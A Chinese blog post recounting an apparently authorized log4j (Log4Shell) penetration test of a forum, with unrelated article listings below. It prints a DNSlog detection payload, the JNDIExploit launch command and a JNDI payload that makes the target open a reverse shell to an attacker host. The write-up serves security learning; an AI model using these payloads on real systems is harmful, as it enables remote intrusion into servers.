【实战】一次简单的log4j漏洞测试

最新推荐文章于 2024-03-19 10:16:46 发布
最新推荐文章于 2024-03-19 10:16:46 发布
阅读量3k 收藏 13
点赞数 6
分类专栏: 漏洞复现 web安全 文章标签: log4j java 乌鸦安全 测试工具 攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdnmmd/article/details/128369369
版权

更新时间:2021.12.19

参考文档:https://www.yuque.com/u8021480/crow/dg9xax
在去年log4j漏洞刚爆发的时候,很多平台都存在漏洞,当时也在第一时间在有授权的情况下对某论坛进行了渗透测试,结果发现存在漏洞,报告之后,漏洞也被很快修复。
本次对该渗透过程进行一个简单的记录,整个过程非常的简单,因为漏洞刚出来,也没有什么waf,所以很快就拿下了。以下过程已进行脱敏,漏洞均已修复。

1. Dnslog漏洞探测

云端攻击机kali : 1x3.xxx.xx2.9
目标机:http://testxxx.cn/
中转文件:JNDIExploit-1.2-SNAPSHOT.jar

1.1 payload描述

log4j漏洞中,一般构造诸如:${jndi:ldap://6bbs.dnslog.cn/test}之类的漏洞,但是在很多时候,因为有//的存在,可能会触发系统自动将其作为url链接访问,导致误判,因此在这里可以使用新的payload进行测试:

${jndi:ldap://${sys:java.version}.335h25.dnslog.cn}

在这里可以显示起版本信息,如果能够显示,则证明一定存在漏洞。

1.2 测试

去dnslog平台申请一个域名:
gx.dnslog.cn

直接构造:

${jndi:ldap://${sys:java.version}.gx.dnslog.cn}

然后在论坛的搜索框执行:

image.png
此时DNSLOG平台有数据,证明存在漏洞:

image.png
既然存在漏洞,那就试试能否拿下RCE

2. log4j RCE

云端攻击机kali : 1x3.xxx.xx2.9
目标机:http://testxxx.com/
中转文件:JNDIExploit-1.2-SNAPSHOT.jar

2.1 准备工作

直接在攻击机上开启JNDIExploit-1.2-SNAPSHOT.jar
命令如下:java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 攻击机ip地址

image.png
通过漏洞探寻得知测试派的搜索框存在log4j漏洞,直接在这里构造exp即可:

${jndi:ldap://攻击机ip:1389/Basic/ReverseShell/攻击机ip/7777}

其中,去请求攻击机的的1389端口,并且将shell反弹给攻击机的7777端口。

在攻击机上另启一个命令行,监听7777端口:
image.png

此时状态如下:

image.png

2.2 攻击测试

直接在输入框里面输入上面构造好的exp
image.png

直接回车,shell就弹回来了:
image.png

判断当前是物理机还是Docker

cat /proc/1/cgroup

image.png
此时显示为物理机。(参考资料:[https://blog.csdn.net/mar_ljh/article/details/109011822](https://blog.csdn.net/mar_ljh/article/details/109011822)

测试结束,开始写报告。

3. 漏洞修复

https://mp.weixin.qq.com/s/O22KoaKFE11dmAR3DVPqBQ

乌鸦安全
关注
  • 6
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j漏洞靶场docker-compose.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,靶场为安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场是渗透测试漏洞攻防演练的理想场所。在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与沟通。在攻防对抗中,往往需要多人协同作战,团队成员之间需要密切配合,共同制定攻击和防御策略。这有助于培养团队合作意识,提高协同作战的效率。 此外,靶场为学习者提供了一个安全的学习环境。在靶场中,学生可以通过实际操作掌握安全知识,了解攻击技术和防御策略。这样的学习方式比传统的理论课程更加生动直观,有助于深化对安全领域的理解。 最后,靶场也是安全社区交流的平台。在靶场中,安全从业者可以分享攻防经验,交流最新的安全威胁情报,共同探讨解决方案。这有助于建立更广泛的安全社区,推动整个行业的发展。 总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机会,促进了团队协作与沟通,为学习者提供了安全的学习环境,同时也是安全社区交流的重要平台。通过靶场的实践操作,安全从业者能够更好地应对不断演变的网络威胁,提高整体的安全水平。
log4j漏洞原理分析&复现&检测&复盘
qq_43665434的博客
08-22 2727
log4j漏洞原理分析&复现&检测&复盘
使用JNDIExploit-1.2-SNAPSHOT.jar复现log4j2详细流程
最新发布
m0_74196038的博客
03-19 843
还有就是之所以这个实验做了两次,就是因为在这个实验当中,我第一次做的时候,由于这个复现是使用那个脚本,所以直接使用命令去开启http服务和ldap服务 ,但是我发现开启了http服务,但是没法访问到,我以为是环境的问题,就打算第二天再做。结果第二天还是不行,后来终于搞明白了,他这里使用工具开启http服务的指令,实际上并没有真正的开启http服务,只是做了一个端口监听,让靶机误以为开启了ldap服务和http服务。-i 指定开启服务的ip,也就是攻击者的ip,也可以是黑客的公网服务器。
ArcGIS漏洞修补工具(Log4J)
01-18
ArcGIS Enterprise 10.9.1及以下版本的 log4j 漏洞修补工具
Log4j详解与实战
12-02
Log4j详解与实战.
log4j复现及难点解决
小城的博客
04-05 4988
卡了我好多天的难题终于解决了铁子们,太激动了。之前做这个实验用的是别人的服务器,没遇到过这个问题。这次自己买了个服务器,没想到却发生了反弹失败的情况。 log4j反弹地址一定要公网服务器,所以我买了一台公网服务器。 但是公网服务器的端口策略是没有开放的,导致监听端口没办法得到回应,最后失败。 请教大屌之后,才解决了这个难题,大屌yyds。接下来记录一下我的实验过程。 环境 一个log4j漏洞的网站 一台公网服务器(端口策略开放) 接下来的实验将以 115.115.115.115
JNDIExploit-1.2-SNAPSHOT
03-20
JNDIExploit-1.2-SNAPSHOT
log4j漏洞分析及总结
csd_ct的专栏
02-14 4万+
2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。 漏洞描述及影响 log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。
Log4j2 漏洞实战案例
mingyqf的博客
09-24 1918
原文链接:https://cloud.tencent.com/developer/article/1984296。
log4shell-vulnerable-app
m0_49025459的博客
12-06 371
使用JNDIExploit-1.2-SNAPSHOT在自己的vps上开启服务 抓包填写payload,获得flag 若有收获,就点个赞吧
命令执行(RCE)与反序列化
赤赤三的博客
03-24 5794
命令执行(RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。): 分类: 远程系统命令执行exec()、system()、assert(): 设计者在编写代码时没有做严格的安全控制,导致攻击者通过接口或相关参数提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器 。 涉及系统命令:assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,``(反单引号) .
Web安全测试中常见逻辑漏洞解析(实战篇)
01-29
逻辑漏洞挖掘一直是安全测试中“经久不衰”的话题。相比SQL注入、XSS漏洞等传统安全漏洞,现在的攻击者更倾向于利用业务逻辑层的应用安全问题,这类问题往往危害巨大,可能造成了企业的资产损失和名誉受损,并且传统...
log4j使用实战
06-25
log4j.rootLogger=INFO,CONSOLE log4j.appender.CONSOLE=org.apache.log4j.ConsoleAppender INFO是日志记录的最低等级,必须写,它和比它高的等级会进入日志,如WARN、ERROR、FATAL、OFF。 关于8个日志等级,参考:...
Log4j 漏洞复现GetShell
weixin_43102772的博客
03-09 379
Log4j2 漏洞复现GetShell
利用极狐GitLab DevSecOps 功能检测 log4j 的多种方式
DevOps008的博客
12-20 1781
极狐GitLab 的 Dependency Scanning 和 Image scan 功能都可以扫描出最近火爆的 log4j 漏洞
Log4j 漏洞测试
热门推荐
我是个农民的博客
12-12 5万+
Log4j 漏洞测试 紧跟潮流,介绍在windows下进行 Log4j 漏洞测试,linux上步骤也都一样。 1、参照项目,项目地址: https://github.com/mbechler/marshalsec 克隆代码到本地,mvn clean package -DskipTests打包,target 目录下会生成marshalsec-0.0.3-SNAPSHOT-all.jar 2、新建一个普通的 java 类,等会将此类注入到待测试的项目中。可以随便写逻辑 (生成文件、定时关机等) 示例:功能是在
如何检查您的服务器是否容易受到 log4j Java 漏洞利用 (Log4Shell) 的影响
学海无涯苦作舟的博客
12-18 2369
在广泛使用的 Java 库中发现了一个关键漏洞,当服务器管理员争先恐后地修复它时,它扰乱了大部分互联网。易受攻击的组件log4j到处都用作包含的库,因此您需要检查服务器并确保它们已更新。 这个漏洞是如何工作的? 就漏洞利用而言,漏洞log4j 是过去几年中最严重的漏洞 之一,在CVSS 量表上获得罕见的 10/10 得分,并将在未来多年困扰整个互联网。 更糟糕的是,log4j 它不是一个应用程序——它是一个被许多其他应用程序使用的开源库。您可能没有直接安装它;它可能包含在其他.jar 文件中,或由其他应用.
Log4j漏洞环境搭建以及复现拿getshell
qq_40898302的博客
04-29 1644
环境搭建 为了实验效果,准备两台设备 kali:10.1.1.17 Windows本机:10.1.1.240 kali虚拟机安装docker环境和vulhub环境 安装方法详情:​​​​​​Vulhub - Docker-Compose file for vulnerability environment 启动docker 进入vulhub/log4j/CVE-2021-44228 启动环境(我是启动过一次,首次启动需要进行编译,需要1-2分钟左右) docker-compose u
log4j2漏洞检测和利用
qq_40909772的博客
12-07 1485
漏洞检测使用的是BP插件,插件地址。 JNDI注入工具,工具地址 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0,命令如下: 将以下命令进行base64编码,IP替换为你攻击机IP。 使用工具命令如下: burp发包: 反弹shell成功:
Matplotlib数据可视化实战,用一元一次函数绘制直线
06-01
好的,以下是使用 Matplotlib 绘制一元一次函数直线的实战: ```python import matplotlib.pyplot as plt import numpy as np # 定义一元一次函数 def line(x, k, b): return k * x + b # 定义 x 取值范围 x = np.arange(-10, 11) # 设置函数参数 k = 2 b = 1 # 计算 y 值 y = line(x, k, b) # 绘制直线 plt.plot(x, y) # 设置坐标轴范围 plt.xlim(-10, 10) plt.ylim(-20, 20) # 设置坐标轴名称 plt.xlabel('X') plt.ylabel('Y') # 显示图像 plt.show() ``` 运行上述代码,即可得到一元一次函数直线的图像。你可以根据自己的需要修改函数参数 `k` 和 `b`,从而得到不同的直线。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值